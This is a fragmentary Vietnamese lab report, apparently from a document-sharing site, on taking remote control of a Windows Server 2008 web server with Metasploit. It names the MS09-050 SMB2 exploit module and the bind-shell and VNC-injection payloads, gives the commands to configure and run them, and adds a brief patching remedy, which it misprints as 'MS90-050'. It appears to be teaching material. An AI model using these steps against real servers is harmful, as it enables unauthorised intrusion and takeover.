Tải bản đầy đủ - 0 (trang)
a. Kịch bản tấn công:

a. Kịch bản tấn công:

Tải bản đầy đủ - 0trang

Mở Metasploit trên Kali Linux bằng dòng lệnh msfconsole

Đầu tiên ta chọn exploit, dùng lệnh “show exploits” để hiện ra tất cả các exploit mà metasploit

framework có hỗ trợ.



Ở đây ta chọn exploit windows/smb/ms09_050_smb2_negotiate_func_index



Ta có thể xem thơng tin về exploit này bằng lệnh “info name_exploit”



21 | P a g e



Tiếp theo, để sử dụng exploit ta dùng câu lệnh “use name_exploit”. Trong đó tham số

name_exploit là tên của exploit.



Sau đó dùng lệnh “show options” để xem cấu hình của exploit mà ta sử dụng.



22 | P a g e



Ta tiến hành thiết đặt các giá trị còn thiếu trong phần cấu hình. Ở đây ta thiết lập địa chỉ nạn

nhân vào mục RHOST



Xem lại phần cấu hình



23 | P a g e



Tiếp theo ta tiến hành chọn payload, dùng lệnh “show payloads” để xem các payload mà

chương trình hỗ trợ.

Ở đây ta dùng payload windows/shell_bind_tcp



Để chọn payload ta dùng lệnh “set payload name_payload” trong đó name_payload là tên của

phần payload.



24 | P a g e



Ta có thể xem phần cấu hình của payload bằng lệnh “show options”



Sau khi thực hiện tất cả các thiết lập xong, ta dùng lệnh exploit để chương trình tiến hành chèn

payload vào máy nạn nhân



25 | P a g e



Kết quả ta truy cập được vào Web Server bằng giao diện dòng lệnh.



c. Cách phòng chống:

Cập nhật bản vá lỗi MS90-050 cho Windows Server 2008



2. Sử Dụng Metasploit Điều Khiển Từ Xa Web Server

a. Kịch bản tấn công:

Dựa vào lỗi MS90-050 trên Windows Server 2008, attacker sử dụng công cụ Metasploit trên Kali Linux để

truy cập từ xa vào server chiếm quyền điều khiển Web Server từ xa.



b. Cách thức tấn công:

Mở Metasploit trên Kali Linux bằng dòng lệnh msfconsole.

Dùng exploit windows/smb/ms09_050_smb2_negotiate_func_index bằng lệnh:

use windows/smb/ms09_050_smb2_negotiate_func_index



26 | P a g e



Thiết đặt giá trị RHOST là IP của Web Server, thực hiện lệnh:

set RHOST [IP Web Server]



Ở đây ta dùng payload windows/vncinject/reverse_tcp bằng lệnh:

set payload windows/vncinject/reverse_tcp



27 | P a g e



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

a. Kịch bản tấn công:

Tải bản đầy đủ ngay(0 tr)

×